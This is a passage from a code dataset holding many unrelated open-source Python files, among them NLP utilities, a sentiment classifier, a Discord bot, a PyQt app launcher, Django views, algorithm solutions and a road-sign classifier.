Set use_cuda = False to run models on CPU.\\n\"\n    try:\n        if use_cuda == True and fluid.is_compiled_with_cuda() == False:\n            print(err)\n            sys.exit(1)\n    except Exception as e:\n        pass\n\ndef parse_data_config(config_path):\n    \"\"\"\n    :param config_path:\n    :return:\n    \"\"\"\n    try:\n        with open(config_path) as json_file:\n            config_dict = json.load(json_file, object_pairs_hook=OrderedDict)\n    except Exception:\n        raise IOError(\"Error in parsing Ernie model config file '%s'\" % config_path)\n    else:\n        return config_dict\n\n\ndef parse_version_code(version_str, default_version_code=1.5):\n    \"\"\"\n    parse paddle fluid version code to float type\n    :param version_str:\n    :param default_version_code:\n    :return:\n    \"\"\"\n    if version_str:\n        v1 = version_str.split(\".\")[0:2]\n        v_code_str = \".\".join(v1)\n        v_code = float(v_code_str)\n        return v_code\n    else:\n        return default_version_code\n\n\ndef truncation_words(words, max_seq_length, truncation_type):\n    \"\"\"\n    :param words:\n    :param max_seq_length:\n    :param truncation_type:\n    :return:\n    \"\"\"\n    if len(words) > max_seq_length:\n        if truncation_type == MaxTruncation.KEEP_HEAD:\n            words = words[0: max_seq_length]\n        elif truncation_type == MaxTruncation.KEEP_TAIL:\n            tmp = words[0: max_seq_length - 1]\n            tmp.append(words[-1])\n            words = tmp\n        elif truncation_type == MaxTruncation.KEEP_BOTH_HEAD_TAIL:\n            tmp = words[1: max_seq_length - 2]\n            tmp.insert(0, words[0])\n            tmp.insert(max_seq_length - 1, words[-1])\n            words = tmp\n        else:\n            words = words[0: max_seq_length]\n\n    return words\n\n\ndef truncate_seq_pair(tokens_a, tokens_b, max_length):\n    \"\"\"\n    :param tokens_a:\n    :param tokens_b:\n    :param max_length:\n    :return:\n    \"\"\"\n    while True:\n        total_length = len(tokens_a) + len(tokens_b)\n        if total_length <= max_length:\n            break\n        if len(tokens_a) > len(tokens_b):\n            tokens_a.pop()\n        else:\n            tokens_b.pop()\n\n\ndef convert_to_unicode(text):\n    \"\"\"Converts `text` to Unicode (if it's not already), assuming utf-8 input.\"\"\"\n    if six.PY3:\n        if isinstance(text, str):\n            return text\n        elif isinstance(text, bytes):\n            return text.decode(\"utf-8\", \"ignore\")\n        else:\n            raise ValueError(\"Unsupported string type: %s\" % (type(text)))\n    elif six.PY2:\n        if isinstance(text, str):\n            return text.decode(\"utf-8\", \"ignore\")\n        elif isinstance(text, unicode):\n            return text\n        else:\n            raise ValueError(\"Unsupported string type: %s\" % (type(text)))\n    else:\n        raise ValueError(\"Not running on Python2 or Python 3?\")\n\n\ndef whitespace_tokenize(text):\n    \"\"\"Runs basic whitespace cleaning and splitting on a piece of text.\"\"\"\n    text = text.strip()\n    if not text:\n        return []\n    tokens = text.split()\n    return tokens\n\n\ndef is_whitespace(char):\n    \"\"\"Checks whether `chars` is a whitespace character.\"\"\"\n    # \\t, \\n, and \\r are technically control characters but we treat them\n    # as whitespace since they are generally considered as such.\n    if char == \" \" or char == \"\\t\" or char == \"\\n\" or char == \"\\r\":\n        return True\n    cat = unicodedata.category(char)\n    if cat == \"Zs\":\n        return True\n    return False\n\n\ndef is_control(char):\n    \"\"\"Checks whether `chars` is a control character.\"\"\"\n    # These are technically control characters but we count them as whitespace\n    # characters.\n    if char == \"\\t\" or char == \"\\n\" or char == \"\\r\":\n        return False\n    cat = unicodedata.category(char)\n    if cat.startswith(\"C\"):\n        return True\n    return False\n\n\ndef is_punctuation(char):\n    \"\"\"Checks whether `chars` is a punctuation character.\"\"\"\n    cp = ord(char)\n
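The truncate_seq_pair helper above pops one token at a time from the longer of the two lists until the pair fits; a quick illustration with hypothetical tokens:

a = list('ABCDEF')   # 6 tokens
b = list('XYZ')      # 3 tokens
truncate_seq_pair(a, b, 7)
assert a == list('ABCD') and b == list('XYZ')   # only the longer list shrank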
    # We treat all non-letter/number ASCII as punctuation.\n    # Characters such as \"^\", \"$\", and \"`\" are not in the Unicode\n    # Punctuation class but we treat them as punctuation anyways, for\n    # consistency.\n    if ((cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or\n            (cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126)):\n        return True\n    cat = unicodedata.category(char)\n    if cat.startswith(\"P\"):\n        return True\n    return False\n\n\ndef printable_text(text):\n    \"\"\"Returns text encoded in a way suitable for print or `tf.logging`.\"\"\"\n\n    # These functions want `str` for both Python2 and Python3, but in one case\n    # it's a Unicode string and in the other it's a byte string.\n    if six.PY3:\n        if isinstance(text, str):\n            return text\n        elif isinstance(text, bytes):\n            return text.decode(\"utf-8\", \"ignore\")\n        else:\n            raise ValueError(\"Unsupported string type: %s\" % (type(text)))\n    elif six.PY2:\n        if isinstance(text, str):\n            return text\n        elif isinstance(text, unicode):\n            return text.encode(\"utf-8\")\n        else:\n            raise ValueError(\"Unsupported string type: %s\" % (type(text)))\n    else:\n        raise ValueError(\"Not running on Python2 or Python 3?\")\n\n\ndef array2tensor(arr_data):\n    \"\"\" convert numpy array to PaddleTensor\"\"\"\n    tensor_data = PaddleTensor(arr_data)\n    return tensor_data\n\n\ndef save_infer_data_meta(data_dict, save_file):\n    \"\"\"\n    :param data_dict:\n    :param save_file:\n    :return:\n    \"\"\"\n\n    json_str = json.dumps(data_dict)\n    with open(save_file, 'w') as json_file:\n        json_file.write(json_str)\n\n","repo_name":"baidu/Senta","sub_path":"senta/utils/util_helper.py","file_name":"util_helper.py","file_ext":"py","file_size_in_byte":7271,"program_lang":"python","lang":"en","doc_type":"code","stars":1780,"dataset":"github-code","pt":"61"}
+{"seq_id":"74029089795","text":"import os\nimport pandas as pd\nfrom transformers import BertTokenizer, BertForSequenceClassification\nimport torch\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# Check whether 'tweets_classificados.csv' already exists and, if so, delete it\noutput_file_path = 'D:/ADS_FATEC/6_periodo/TG_II/tweets_classificados_2023.csv'\nif os.path.exists(output_file_path):\n    os.remove(output_file_path)\n\n# Load the data from the CSV of unclassified tweets\nlines = []\nfile_path = 'D:/ADS_FATEC/6_periodo/TG_II/tweets_2023.csv'\n\n# Open the CSV file and read the data\nwith open(file_path, 'r', encoding='utf-8-sig') as file:\n    for line in file:\n        # Append each line to the list, stripping any extra whitespace\n        lines.append(line.strip()) \n\n# Choose the pre-trained model\nmodel_name = \"bert-base-uncased\"\n\n# Load the tokenizer and the model\ntokenizer = BertTokenizer.from_pretrained(model_name)\nmodel = BertForSequenceClassification.from_pretrained(model_name)\n\n# List to store the classified sentiments\nsentiments = []\n\n# Initialize dictionaries to count the sentiments\ncontagem_sentimentos = {'Positivo': 0, 'Negativo': 0}\n\n# Create a list to store the classified tweets\nclassified_tweets = []\n\n# For each unclassified tweet\nfor tweet in lines:\n    # Tokenize the text\n    inputs = tokenizer(tweet, return_tensors=\"pt\", padding=True, truncation=True)\n\n    # Run inference with the model\n    outputs = model(**inputs)\n    logits = outputs.logits\n\n    # Compute the probabilities\n    probabilities = torch.softmax(logits, dim=1)\n\n    # Get the index of the class with the highest probability\n    predicted_class = torch.argmax(probabilities, dim=1).item()\n\n    # Interpret the result\n    sentiment_classes = [\"Positivo\", \"Negativo\"]\n    sentiment = sentiment_classes[predicted_class]\n\n    sentiments.append(sentiment)\n\n    # Update the count according to the sentiment\n    contagem_sentimentos[sentiment] += 1\n\n    # Store the classified tweet with its sentiment in a list\n    classified_tweets.append((tweet, sentiment))\n\n# Save the classified tweets to a CSV file\nclassified_data = pd.DataFrame(classified_tweets, columns=['Tweets', 'Sentimento'])\nclassified_data.to_csv(output_file_path, index=False, encoding='utf-8-sig')\n\n# Show the totals of positive and negative\ntotal_positivo = contagem_sentimentos['Positivo']\ntotal_negativo = contagem_sentimentos['Negativo']\n\n# Compute the percentages\ntotal_tweets = total_positivo + total_negativo\npercent_positivo = (total_positivo / total_tweets) * 100\npercent_negativo = (total_negativo / total_tweets) * 100\n\n# Create a bar chart to visualize the sentiment distribution\nsentiment_labels = ['Positivo', 'Negativo']\nsentiment_percentages = [percent_positivo, percent_negativo]\n\nplt.figure(figsize=(6, 4))\nsns.barplot(x=sentiment_labels, y=sentiment_percentages)\nplt.title('Distribuição de Sentimentos (Porcentagem)')\nplt.xlabel('Sentimento')\nplt.ylabel('Porcentagem')\nplt.ylim(0, 100)\nplt.show()","repo_name":"LaraScaranello/web_scraping","sub_path":"analise2.py","file_name":"analise2.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"24949479961","text":"import os\nimport discord\nfrom dotenv import load_dotenv\nfrom discord.ext import commands\nfrom trebek import Trebek\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\nGUILD = os.getenv('DISCORD_GUILD')\n\nbot = commands.Bot(command_prefix=commands.when_mentioned_or('!'))\n\n@bot.event\nasync def on_ready():\n    for guild in bot.guilds:\n        if guild.name == GUILD:\n            break\n    print(f'{bot.user} is connected to the following guild: \\n'\n          f'{guild.name}(id: {guild.id})'\n    )\n\n@bot.command()\nasync def please(ctx):\n    await ctx.send('just give me a chance!')\n\nbot.add_cog(Trebek(bot))\nbot.run(TOKEN)\n\n","repo_name":"lucas-hopkins/discord_bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"2070766213","text":"import os.path\nimport sqlite3\nimport sys\nfrom os import startfile\nfrom sys import argv, exit\n\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QTableWidgetItem, QMessageBox\n\nfrom item import AddItem, ChangeItem # dialogs for creating and editing an item\nfrom NewTable import NewTable # dialog for creating a new table\nfrom parent_of_main import MainFromUi # class generated with pyuic5\nfrom welcome import Welcome # first-run greeting\nfrom contact import ContactInformation # contact information\n\n\nclass Main(QMainWindow, MainFromUi): # main class\n    def __init__(self):\n        super(Main, self).__init__()\n        self.setupUi(self)\n        self.setWindowTitle(\"LaunchApp\")\n        self.show()\n        # next, check whether the welcome window should be shown\n        with open(\"data/flag.txt\") as f: # open the .txt file for the check (if empty - no, if it contains \"...\" - yes)\n            if not f.read(): # checks whether the user ticked the \"do not show again\" checkbox\n                self.welcome = Welcome() # if the condition holds, the welcome dialog opens\n                self.welcome.show() # the class code lives in another file\n\n        # below, the buttons are connected to their handler methods\n
        self.pushButton_run.clicked.connect(self.run) # button that launches the applications\n        self.description.triggered.connect(self.open_description) # application description (in the menu bar)\n        self.developer.triggered.connect(self.open_contact_information) # contact info (in the menu bar)\n        self.pushButton_new.clicked.connect(self.create_table) # button for creating a new section\n        self.pushButton_add_item.clicked.connect(self.add_item) # button for adding an item to a section\n        self.pushButton_change_item.clicked.connect(self.change_item) # button for editing an item in a section\n        self.pushButton_open.clicked.connect(self.open_table) # button for opening a section (table)\n        self.pushButton_del.clicked.connect(self.del_table) # button for deleting a section (table)\n        self.pushButton_del_item.clicked.connect(self.del_item) # button for deleting an item in a section\n        self.con = sqlite3.connect(\"LaunchApp.sqlite\") # connect to the database\n        self.cur = self.con.cursor() # create a cursor\n        self.res = self.cur.execute(\"SELECT name FROM sqlite_master WHERE type='table'\")\n        # the query above fetches the names of all sections\n        for i in self.res: # add all the names to the comboBox\n            if i[0] != \"sqlite_sequence\":\n                self.comboBox.addItem(i[0])\n        with open(\"data/last_table.txt\", \"r\", encoding=\"utf-8\") as f: # read the name of the last opened table\n            self.last_table = f.read().strip()\n        if self.last_table:\n            self.current_table = self.last_table\n        self.comboBox.setCurrentIndex(self.comboBox.findText(self.current_table)) # select the last opened table\n        self.update_table() # call the method that fills the table\n\n    def run(self): # launch the applications\n        self.pathes = [path_[0] for path_ in # collect the application paths\n                       self.cur.execute(f'''SELECT \"Путь\" FROM \"{self.comboBox.currentText()}\"''')]\n        for path_ in self.pathes:\n            try:\n                print(path_)\n                startfile(os.path.abspath(path_)) # launch the application\n            except Exception:\n                self.statusbar.showMessage(f\"Нет приложения на пути {os.path.abspath(path_)}\")\n\n    def open_description(self): # open the description document\n        startfile(r'Презентация, ТЗ и ПЗ\\Пояснительная записка.docx')\n\n    def open_contact_information(self): # dialog with contact information\n        self.widget = ContactInformation()\n        self.widget.show()\n\n    def open_table(self): # method that opens a section\n        self.last_open_table(self.comboBox.currentText()) # remember the last opened table\n        self.update_table() # refresh the table\n\n    def create_table(self): # method for creating a new section\n        self.widget = NewTable(self) # dialog for creating a new section\n        self.widget.show()\n\n    def del_table(self): # method for deleting a section\n        self.message_box = QMessageBox() # MessageBox to confirm the deletion\n        self.message_box.setWindowTitle(\"Удаления раздела\") # the title\n        self.message_box.setText(f\"Вы уверенны что хотите удалить раздел: {self.comboBox.currentText()}?\") # the question\n        self.message_box.setStandardButtons(QMessageBox.Yes | QMessageBox.No) # create the Yes/No buttons\n        self.message_box.buttonClicked.connect(self.del_or_no) # call the handler when a button is clicked\n        self.message_box.exec()\n\n    def add_item(self): # method for creating a new item\n        self.widget = AddItem(self) # dialog for creating a new item\n        self.widget.show()\n\n    def change_item(self): # method for editing an item\n        self.statusbar.showMessage(\"\")\n        self.row = list(set([i.row() for i in self.tableWidget.selectedItems()])) # selected rows in the table\n        if not self.row: # check whether any row is selected at all\n            self.statusbar.showMessage(\"НЕ ВЫБРАНА ЯЧЕЙКА \" * 6)\n        else:\n            self.row = self.row[0] # the first selected row\n            self.select_data = [self.tableWidget.item(self.row, i).text() for i in range(3)] # data of the selected item\n            self.widget = ChangeItem(self) # dialog for editing an item\n            self.widget.show()\n\n    def last_open_table(self, title): # method that saves the last selected section to a .txt file\n        with open(\"data/last_table.txt\", \"w\", encoding=\"utf8\", newline=\"\") as f:\n            f.write(title)\n\n    def update_table(self): # fill the TableWidget with data\n        self.res = self.cur.execute(f'''SELECT * FROM \"{self.comboBox.currentText()}\"''').fetchall()\n        self.headerName = [i[1] for i in # the table header names\n                           self.cur.execute(f\"PRAGMA table_info('{self.comboBox.currentText()}')\").fetchall()]\n        # next, fill in the table\n        self.tableWidget.setColumnCount(len(self.headerName))\n        self.tableWidget.setHorizontalHeaderLabels(self.headerName)\n        self.len_res = len(self.res)\n        self.tableWidget.setRowCount(self.len_res)\n        for i, elem in enumerate(self.res):\n            for j, val in enumerate(elem):\n                self.tableWidget.setItem(i, j, QTableWidgetItem(str(val)))\n        self.tableWidget.resizeColumnsToContents()\n        # next, stretch the columns\n        header = self.tableWidget.horizontalHeader()\n        header.setSectionResizeMode(0, QtWidgets.QHeaderView.ResizeToContents)\n        header.setSectionResizeMode(1, QtWidgets.QHeaderView.ResizeToContents)\n        header.setSectionResizeMode(2, QtWidgets.QHeaderView.Stretch)\n\n    def del_or_no(self, btn): # method handling Yes/No when deleting a table\n        if btn.text() == \"&Yes\":\n            self.cur.execute(f\"DROP TABLE '{self.comboBox.currentText()}'\") # drop the table from the database\n            self.con.commit() # commit\n            self.comboBox.clear() # clear the comboBox\n            # fetch the names of all tables in the database\n            self.res = self.cur.execute(\"SELECT name FROM sqlite_master WHERE type='table'\").fetchall()\n            # fill the comboBox with the section names\n            for i in self.res:\n                if i[0] != \"sqlite_sequence\":\n                    print(i[0])\n                    self.comboBox.addItem(i[0])\n\n            self.comboBox.setCurrentIndex(self.comboBox.findText(self.res[-1][0])) # select the table that\n            # preceded the deleted one\n            self.last_open_table(self.comboBox.currentText()) # save the selected table name to the file\n            self.update_table() # fill the TableWidget with data\n\n    def del_item(self): # delete an item\n        self.statusbar.showMessage(\"\")\n        self.row = list(set([i.row() for i in self.tableWidget.selectedItems()])) # selected rows in the table\n        if not self.row: # check whether any row is selected at all\n            self.statusbar.showMessage(\"НЕ ВЫБРАНА ЯЧЕЙКА \" * 6)\n        else:\n            self.row = self.row[0] # the first selected row\n            self.select_data = [self.tableWidget.item(self.row, i).text() for i in range(3)] # data of the selected item\n            self.cur.execute(f'''DELETE from {self.comboBox.currentText()}\n                            WHERE \"ID\" = {self.select_data[0]}''') # delete the item\n            self.con.commit() # commit\n            self.update_table() # fill the TableWidget with data\n\n\ndef except_hook(cls, exception, traceback): # so that errors are shown, just in case\n    sys.__excepthook__(cls, exception, traceback)\n\n\nif __name__ == \"__main__\":\n    app = QApplication(argv)\n    window = Main()\n    sys.excepthook = except_hook\n    exit(app.exec())\n","repo_name":"AbulmuslimAtaev/LaunchApp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11093,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"42017656327","text":"import transformers\n\nDEVICE = \"cuda\"\nMAX_LEN = 128\nTRAIN_BATCH_SIZE = 8\nVALID_BATCH_SIZE = 4\nEPOCHS = 10\n\nBERT_PATH = '../input/bert-base-uncased'\nTRAINING_FILE = 'train_preprocess_2.csv'\n# TRAINING_FILE = 'IMDB_Dataset_1.csv'\nMODEL_PATH = 'model_2.bin'\n\nTOKENIZER = transformers.BertTokenizer.from_pretrained(BERT_PATH, do_lower_case=True)\n","repo_name":"abhinandansrivastava/DisasterTweets","sub_path":"src/multiInputClassifier/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"43472871014","text":"import numpy as np\nimport random\n\n\ndef sigmoid(val):\n    return 1/(1+np.exp(-val))\n\ndef dsigmoid_to_dval(val): \n    sig = sigmoid(val)\n    return sig * (1 - sig) \n\n\ndef make_results_reproducible():\n    random.seed(12345678)\n    np.random.seed(12345678)\n\ndef make_results_random():\n    random.seed()\n    np.random.seed()\n\ndef plot_images(ax ,images_in_row,image_height, image_width,samples,_X,_y):\n    \"\"\"\n    this function works ONLY if len(samples) % images_in_row is zero\n    \n    \"\"\"\n    images = []\n    sample = 0\n\n    while sample < len(samples):\n        images_row = []\n        for _ in range(images_in_row):\n            images_row.append(_X[sample].reshape(image_height,image_width))\n            sample += 1\n            if sample == len(samples):\n                break\n        \n        merged_images_horizontal = np.concatenate(images_row,axis=1) # append horizontally\n        images.append(merged_images_horizontal)\n\n    merged_row_images_vertically = np.concatenate(images,axis=0) # append vertically\n    ax.imshow(merged_row_images_vertically, cmap='gray')\n    ax.axes.xaxis.set_visible(False)\n    ax.axes.yaxis.set_visible(False)","repo_name":"NathanKr/neural-networks-learn","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70758483396","text":"class Solution:\n    def makeArrayIncreasing(self, arr1: List[int], arr2: List[int]) -> int:\n        arr2 = list(set(arr2))\n        arr2.sort()\n\n        dp = {-1:0}\n\n        for i in range(len(arr1)):\n            new_dp = defaultdict(lambda: math.inf)\n            for prev in dp:\n                if arr1[i] > prev:\n                    new_dp[arr1[i]] = min(new_dp[arr1[i]], dp[prev])\n                idx = bisect.bisect_right(arr2, prev)\n                if idx < len(arr2):\n                    new_dp[arr2[idx]] = min(new_dp[arr2[idx]], 1 + dp[prev])\n            dp = new_dp\n\n        return min(dp.values()) if dp else -1","repo_name":"aso2001/LeetCode","sub_path":"1187-make-array-strictly-increasing/1187-make-array-strictly-increasing.py","file_name":"1187-make-array-strictly-increasing.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
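Because sqlite3 placeholders can bind only values, not identifiers, the f-string table names in the LaunchApp record above cannot be parameterized directly; a hedged sketch of a whitelist guard (safe_table is not part of the original code):

def safe_table(cur, name):
    # identifiers cannot be bound with '?', so validate against the catalog
    tables = {row[0] for row in cur.execute(
        "SELECT name FROM sqlite_master WHERE type='table'")}
    if name not in tables:
        raise ValueError('unknown table: ' + name)
    return name

# cur.execute(f'SELECT * FROM "{safe_table(cur, table_name)}"')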
+{"seq_id":"23499427391","text":"import os\nimport pprint\ndef main ():\n\toutput = '';\n\t[inputCount, pancakeList] = readFile()\n\tfor i in range(0,int(inputCount)):#no need to match last item\n\t\tpancake = pancakeList[i]\n\t\tprint('pancake: %s'%pancake)\n\t\tcount = 0\n\t\tif pancake[-1] == '-':\n\t\t\tcount = 1\n\t\tfor j in range(0,len(pancake)-1):\n\t\t\tprint('pancake[j]: %s'%pancake[j])\n\t\t\tprint('pancake[j+1]: %s'%pancake[j+1])\n\t\t\tif pancake[j] != pancake[j+1]:\n\t\t\t\tcount+=1\n\t\tp_str = 'Case #{0}: {1}\\n'.format((i+1),count)\n\t\toutput += p_str\n\t\tprint ('\t\t%s'%p_str[0:-1])\n\twriteFile(output)\n\ndef readFile ():\n\twith open('B-large.in') as f:\n\t\ts = f.read()\n\t# s = '9\\n-\\n+\\n-+\\n+-\\n+++\\n--=-\\n--+--+\\n-+-+-+\\n+-+-+-\\n'\n\ts = s.split('\\n')\n\tinputCount = s.pop(0);\n\ts.pop(-1)\n\treturn [inputCount,s]\n\ndef writeFile (str):\n\twith open('B-large.out', 'w') as f:\n\t\tf.write(str)\n\nif __name__ == '__main__':\n\tmain()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_178/3893.py","file_name":"3893.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26462104561","text":"from django.urls import path\nfrom .views import SnackCreateView, SnackDeleteView,SnackListView,SnackUpdateView,SnackDetailView\n\n\nurlpatterns = [\n \n path('', SnackListView.as_view(), name='view'), \n path('/', SnackDetailView.as_view(), name='detailView'),\n path('/update/',SnackUpdateView.as_view(), name='update') ,\n path('/delete/',SnackDeleteView.as_view(), name='delete') ,\n path('create/',SnackCreateView.as_view(), name='create') ,\n\n]","repo_name":"Obada-gh/django-crud","sub_path":"snacks/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5217469101","text":"\"\"\"Consts for the Ukraine Alarm.\"\"\"\nfrom __future__ import annotations\n\nfrom homeassistant.const import Platform\n\nDOMAIN = \"ukraine_alarm\"\nATTRIBUTION = \"Data provided by Ukraine Alarm\"\nMANUFACTURER = \"Ukraine Alarm\"\nALERT_TYPE_UNKNOWN = \"UNKNOWN\"\nALERT_TYPE_AIR = \"AIR\"\nALERT_TYPE_ARTILLERY = \"ARTILLERY\"\nALERT_TYPE_URBAN_FIGHTS = \"URBAN_FIGHTS\"\nALERT_TYPES = {\n ALERT_TYPE_UNKNOWN,\n ALERT_TYPE_AIR,\n ALERT_TYPE_ARTILLERY,\n ALERT_TYPE_URBAN_FIGHTS,\n}\nPLATFORMS = [Platform.BINARY_SENSOR]\n","repo_name":"wdlea/DevaanshAndWilliamUberGLobalHackathonCoding","sub_path":"homeassistant/lib/python3.9/site-packages/homeassistant/components/ukraine_alarm/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31418278916","text":"from django.shortcuts import render, redirect, get_list_or_404\nfrom django.contrib import messages\nfrom .forms import ContactoForm, CustomUserCreationForm, CitaForm, Cita\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.decorators import login_required, permission_required\n\n# Create your views here.\n\ndef index(request): \n data = {\n 'form': CitaForm()\n }\n \n if request.method == 'POST':\n formulario = CitaForm(data=request.POST)\n if formulario.is_valid():\n formulario.save()\n data[\"mensaje\"] = \"Cita Enviada\"\n else:\n data[\"form\"] = formulario \n return render(request, 'app/index.html', data)\n\ndef contact(request):\n data = 
{\n 'form': ContactoForm()\n }\n \n if request.method == 'POST':\n formulario = ContactoForm(data=request.POST)\n if formulario.is_valid():\n formulario.save()\n data[\"mensaje\"] = \"Contacto guardado\"\n else:\n data[\"form\"] = formulario\n\n return render(request, 'app/contact.html', data)\n\ndef about(request):\n return render(request, 'app/about.html')\n\ndef registro(request):\n data = {\n 'form': CustomUserCreationForm()\n }\n\n if request.method == 'POST':\n formulario = CustomUserCreationForm(data=request.POST)\n if formulario.is_valid():\n formulario.save()\n user = authenticate(username=formulario.cleaned_data[\"username\"],password=formulario.cleaned_data[\"password1\"])\n login(request, user)\n messages.success(request, \"Te has registrado correctamente\")\n return redirect(to=\"home\")\n data[\"form\"] = formulario\n return render(request, 'registration/registro.html', data)\n\n@permission_required('app.view_paciente')\ndef listar_pacientes(request):\n pacientes = Cita.objects.all()\n\n data = {\n 'pacientes': pacientes\n }\n return render(request, 'app/pacientes/listar.html',data)\n\ndef modificar_cita(request,id):\n cita = get_list_or_404(Cita, id=id)\n data = {\n 'form' : CitaForm(instance=cita)\n }\n return render(request, 'app/pacientes/modificar.html',data)","repo_name":"Dmoraga2193/Centro-Medico-Galenos-con-Django","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39499789371","text":"# https://leetcode.com/problems/three-equal-parts/\n# https://leetcode.com/problems/three-equal-parts/solution/\n# Time: O(N)\n# Space: O(N)\n# find same number of ones in three part\n\nclass Solution(object):\n def threeEqualParts(self, A):\n \"\"\"\n :type A: List[int]\n :rtype: List[int]\n \"\"\"\n NA = [-1, -1]\n \n ones = sum(A)\n if ones % 3 != 0:\n return NA\n if ones == 0:\n return [0, len(A) - 1]\n \n m, breaks, k = ones / 3, [], 0\n starts, ends = {1, m + 1, 2 * m + 1}, {m, 2 * m, 3 * m}\n for i, x in enumerate(A):\n if x:\n k += 1\n if k in starts:\n breaks.append(i)\n # use if instead of elif. e.g. 
                # use if instead of elif. e.g. m = 1\n                if k in ends:\n                    breaks.append(i)\n        \n        i1, j1, i2, j2, i3, j3 = breaks\n        # the parts containing the ones should be the same\n        if not(A[i1:j1+1] == A[i2:j2+1] == A[i3:j3+1]):\n            return NA\n        \n        # number of zeros after each part\n        x = i2 - j1 - 1\n        y = i3 - j2 - 1\n        z = len(A) - j3 - 1\n        \n        if x < z or y < z:\n            return NA\n        \n        j1 += z\n        j2 += z\n        return [j1, j2 + 1]\n","repo_name":"jwyx3/practices","sub_path":"leetcode/array/three-equal-parts.py","file_name":"three-equal-parts.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"25176419065","text":"'''\nIOS Sms\n----------\n'''\n\nfrom plyer.facades import Sms\nfrom pyobjus import autoclass, objc_str\nfrom pyobjus.dylib_manager import load_framework\n\nNSURL = autoclass('NSURL')\nNSString = autoclass('NSString')\nUIApplication = autoclass('UIApplication')\nload_framework('/System/Library/Frameworks/MessageUI.framework')\n\n\nclass IOSSms(Sms):\n\n    def _send(self, **kwargs):\n        '''\n        This method sends messages to recipients.\n\n        Expects 2 parameters in kwargs:\n            - recipient: String type\n            - message: String type\n\n        Opens a message interface with recipient and message information.\n        '''\n        recipient = kwargs.get('recipient')\n        message = kwargs.get('message')\n        url = \"sms:\"\n        if recipient:\n            # Apple has not supported multiple recipients yet.\n            url += str(recipient)\n        if message:\n            # Apple has not supported it yet.\n            pass\n\n        nsurl = NSURL.alloc().initWithString_(objc_str(url))\n        UIApplication.sharedApplication().openURL_(nsurl)\n\n\ndef instance():\n    return IOSSms()\n","repo_name":"kivy/plyer","sub_path":"plyer/platforms/ios/sms.py","file_name":"sms.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":1476,"dataset":"github-code","pt":"61"}
+{"seq_id":"34619392437","text":"class StripChars:\n    def __init__(self, chars):\n        self.__chars = chars\n\n    def __call__(self, *args, **kwargs):\n        if not isinstance(args[0], str):\n            raise ValueError('arg must be string')\n\n        return args[0].strip(self.__chars)\n\n\nif __name__ == '__main__':\n    s1 = StripChars('?:!.:')\n    print(s1('Hello World!'))\n    ","repo_name":"fisher1706/opp_python","sub_path":"lesson_11/test_02.py","file_name":"test_02.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"36762335203","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nThis is a script used for classifying a given image.\n\"\"\"\nfrom sklearn.externals import joblib\n\nfrom load_data import load_image\nfrom preprocess import preprocess_single\n\n\ndef classify(model_location, image_location, results_location, print_result=False, array=False):\n    \"\"\"Classify a given image file and return the detected sign name.\"\"\"\n    # Load model from file.\n    model = joblib.load(model_location)\n\n    # Load and preprocess the image.\n    if array is False:\n        image = preprocess_single(load_image(image_location))\n    else:\n        image = preprocess_single(image_location)\n\n    # Predict road sign.\n    prediction = model.predict(image)\n\n    # Load available road sign names.\n    with open(results_location) as file_name:\n        results = file_name.readlines()\n    results = [x.strip() for x in results]\n\n    # Print road sign name.\n    end = len(results)\n    for i in range(end):\n        if prediction[0] == i:\n            result = results[i]\n            label = i\n\n    if print_result:\n        print('\\nLabel of predicted road sign: ', prediction[0])\n
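A short walk-through of the index bookkeeping in the threeEqualParts snippet above, on a small hypothetical input:

# A = [1,0,1,0,1,0], ones = 3, m = 1
# starts = ends = {1, 2, 3}  (with m = 1 every start index is also an end
# index, which is why the scan uses two plain ifs rather than if/elif)
# breaks = [0,0, 2,2, 4,4]  ->  i1=j1=0, i2=j2=2, i3=j3=4
# zeros after the three parts: x = 1, y = 1, z = 1
# x >= z and y >= z, so j1 -> 1, j2 -> 3 and the result is [1, 4]:
# [1,0] | [1,0] | [1,0], each part reading as binary 10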
